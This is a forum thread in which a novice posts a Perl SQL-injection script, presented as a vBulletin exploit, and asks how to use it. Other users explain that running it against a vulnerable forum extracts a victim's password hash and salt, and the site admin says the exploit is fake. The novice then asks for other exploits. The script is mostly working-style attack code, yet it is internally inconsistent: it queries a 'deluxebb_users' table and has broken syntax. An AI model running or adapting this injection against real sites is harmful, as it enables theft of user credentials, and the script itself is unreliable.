Waraxe Forums

magicmonkey · Regular user

I'm a newbee I found the below exploit, but without sounding dumb, how do I use it? Thanks in-advance.

!/usr/bin/perl

use IO::Socket;

if (!$ARGV[2]) {

print q{
Usage: perl vbulletin.pl host /directory/ victim_userid

perl vbulletin.pl www.somesite.com /forum/ 1

};

}

$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print" __ \r\n";
print" /|/| / / / | / \r\n";
print"( / | ___ ( ___ (___| ___ ___ ( ___ ___ ___ \r\n";
print"| )| )|___ | | ) | )| )| |___)|___)| ) __/ \r\n";
print"| / |__/|| | |__/| | / |__/||__ | \ |__ | /__ \r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
print "--------------------------------------[Usage]-----------------------------------\r\n\r\n";
print " Eg: localhost / 1 Eg2: localhost /vb3/ 5 \r\n\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print " \r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";
print "--------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http://)//eg;

$path = $dir;
$path .=

"misc.php?sub=profile&****=0')+UNION+SELECT+0,salt,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED OR YOU DIDNT SPECIFY A SITE";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

print "--[ REPORT
]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print
"--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print
"----------------------This forum isnt Vulnerable, or incorrect path----------\r\n";

#########################################################
# ahm3d #
# #
# ... #
# #
# #
# #
# #
#########################################################

AIR_Nayden · Advanced user

in command prompt

perl PATH_TO_EXPLOUIT

but you have to have PERL installed Wink

where did you get this from?

magicmonkey · Regular user

here http://www.alm3refh.com/vb/t11139.html

what will happen when I run the script?

AIR_Nayden · Advanced user

u will execute the code in your exploit...... and if you have set the arguments right and you have a vulnerable forum you'll be able to extract hash and salt

magicmonkey · Regular user

and with them i used be able to create the admin pw?

waraxe · Site admin

This exploit is fake, don't waste your time Smile

magicmonkey · Regular user

thanks for the heads up, are there any exploits for 3.6.7 out there?